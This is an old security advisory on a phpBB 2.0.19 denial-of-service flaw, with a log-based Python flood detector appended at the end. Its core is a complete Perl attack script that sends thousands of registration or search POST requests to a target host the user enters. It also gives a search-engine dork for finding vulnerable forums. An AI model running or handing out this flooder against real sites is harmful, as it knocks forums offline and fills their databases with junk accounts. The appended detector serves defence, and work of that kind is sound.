------------------------------------------------------
HYSA-2006-001 h4cky0u.org Advisory 010
------------------------------------------------------
Date - Wed Jan 25 2006

TITLE:
======

phpBB 2.0.19 search.php and profile.php DOS Vulnerability

SEVERITY:
=========

High

SOFTWARE:
=========

phpBB 2.0.19 and prior

INFO:
=====

phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and helpful
FAQ. Based on the powerful PHP server language and your choice of MySQL,
MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal
free community solution for all web sites.

Support Website : http://www.phpbb.com

BUG DESCRIPTION:
================

The bug was originally found by HaCkZaTaN of NeoSecurityteam. The
original exploit code can be found at -

http://h4cky0u.org/viewtopic.php?t=637

That exploit affected only versions up to phpBB 2.0.15. The exploit code
has been recoded so that it affects the latest version too. The bug
resides in the following two scripts:

profile.php << By registering as many users as you can.
search.php  << By searching in a way that the db cannot understand.

Proof Of Concept Code:
======================

#!/usr/bin/perl
#######################################
## Recoded by: mix2mix and Elioni of http://ahg-khf.org
## And h4cky0u Security Forums (http://h4cky0u.org)
## Name: phpBBDoSReloaded
## Original Author: HaCkZaTaN of Neo Security Team
## Tested on phpBB 2.0.19 and earlier versions
## Ported to perl by g30rg3_x
## Date: 25/01/06
#######################################
use IO::Socket;

## Initialize the loop counter X
$x = 0;

print q(
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
Recoded by Albanian Hackers Group &
h4cky0u Security Forums

);
print q(Host |without-> http://www.| );
$host = <STDIN>;
chop ($host);

print q(Path |example-> /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);

print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = <STDIN>;
chop ($type);

## Type 1: registration flood
if($type == 1){

    ## User loop for 9999 loops (enough for flood xDDDD)
    while($x != 9999)
    {
        ## The member that is registered automatically, numbered "X"
        $uname = "username=AHG__" . "$x";

        ## The e-mail that is registered in the database, numbered "X"
        $umail = "&email=AHG__" . "$x";

        ## Full registration form body as profile.php expects it (mode=register)
        $postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

        $lrg = length $postit;

        my $sock = new IO::Socket::INET (
            PeerAddr => "$host",
            PeerPort => "80",
            Proto    => "tcp",
        );
        ## Albanian: "Cannot connect to the host because it is DoSed or does not exist"
        die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock;

        ## Send through the socket the HTTP commands for registering a user in phpBB forums
        print $sock "POST $pth"."profile.php HTTP/1.1\n";
        print $sock "Host: $host\n";
        print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
        print $sock "Referer: $host\n";
        print $sock "Accept-Language: en-us\n";
        print $sock "Content-Type: application/x-www-form-urlencoded\n";
        print $sock "Accept-Encoding: gzip, deflate\n";
        print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
        print $sock "Connection: Keep-Alive\n";
        print $sock "Cache-Control: no-cache\n";
        print $sock "Content-Length: $lrg\n\n";
        print $sock "$postit\n";
        close($sock);

        ## Print a "+" for every loop
        syswrite STDOUT, "+";

        $x++;
    }

## Type 2: search flood
}
elsif ($type == 2){
    while($x != 9999)
    {
        ## Final search string to send
        $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

        ## Post body length
        $lrg = length $postit;

        ## Connect socket with variables provided by user
        my $sock = new IO::Socket::INET (
            PeerAddr => "$host",
            PeerPort => "80",
            Proto    => "tcp",
        );
        die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;

        ## Send through the socket the HTTP commands for a DB search in phpBB forums
        print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
        print $sock "Host: $host\n";
        print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
        print $sock "Referer: $host\n";
        print $sock "Accept-Language: en-us\n";
        print $sock "Content-Type: application/x-www-form-urlencoded\n";
        print $sock "Accept-Encoding: gzip, deflate\n";
        print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
        print $sock "Connection: Keep-Alive\n";
        print $sock "Cache-Control: no-cache\n";
        print $sock "Content-Length: $lrg\n\n";
        print $sock "$postit\n";
        close($sock);

        ## Print a "+" for every loop
        syswrite STDOUT, "+";

        ## Increment X by one for every loop
        $x++;
    }
}else{
    ## STF??? What did you type
    ## Albanian: "Option not allowed"
    die "Mundësia nuk Lejohet +_-???\n";
}

FIX:
====

No fix available as of date.

GOOGLEDORK:
===========

"Powered by phpBB"

CREDITS:
========

- This vulnerability was discovered and researched by HaCkZaTaN of
  NeoSecurityteam.

- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest
  release of the script -
  Web : http://ahg-khf.org
  mail : webmaster at ahg-khf dot org

- Co Researcher -
  h4cky0u of h4cky0u Security Forums.
  mail : h4cky0u at gmail dot com
  web : http://www.h4cky0u.org

ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt

--
http://www.h4cky0u.org
(In)Security at its best...
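Both flood paths in the advisory (one POST per loop to profile.php and to search.php) leave a distinctive trace in the web server access log: a single client repeating POSTs to the same phpBB script far faster than a person would. The following Python detection is an added example, not part of the advisory or of phpBB; it counts POSTs per client and script in a sliding time window over constructed Apache-style log lines, and the window, threshold, client addresses and /phpBB2/ path are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined log format; only the fields the check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) ')
WATCHED = {"profile.php", "search.php"}  # phpBB 2.x scripts the PoC hits with one POST per iteration


def parse_line(line):
    """Return (ip, epoch_seconds, script) for a POST to a watched script, else None."""
    m = LOG_RE.match(line)
    if not m or m.group("method") != "POST":
        return None
    script = m.group("path").split("?", 1)[0].rsplit("/", 1)[-1]  # strip query string and directory
    if script not in WATCHED:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return m.group("ip"), ts, script


def detect_floods(lines, window=60, threshold=20):
    """Return (ip, script, burst_start_epoch, count) whenever one client's POSTs to one
    watched script reach `threshold` inside a sliding `window`-second span."""
    recent = defaultdict(deque)  # (ip, script) -> timestamps still inside the window
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, script = parsed
        q = recent[(ip, script)]
        q.append(ts)
        while ts - q[0] > window:  # drop requests that fell out of the window
            q.popleft()
        if len(q) == threshold:  # alert when the threshold is crossed, not on every request after it
            alerts.append((ip, script, int(q[0]), len(q)))
    return alerts


# Constructed sample (assumed addresses and path): one client POSTs to profile.php 25 times
# in 25 seconds; a second client runs one search and views a page, which must not alert.
SAMPLE_LOG = [
    f'203.0.113.5 - - [25/Jan/2006:10:00:{i:02d} +0000] "POST /phpBB2/profile.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
    for i in range(25)
] + [
    '198.51.100.7 - - [25/Jan/2006:10:00:10 +0000] "POST /phpBB2/search.php?mode=results HTTP/1.1" 200 8200 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Jan/2006:10:00:11 +0000] "GET /phpBB2/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, script, start, count in detect_floods(SAMPLE_LOG):
        print(f"flood: {ip} sent {count} POSTs to {script} within 60s starting at epoch {start}")
```

The same deque-per-key logic works on a live `tail -f` of the log, since each line is processed once and only timestamps inside the window are retained.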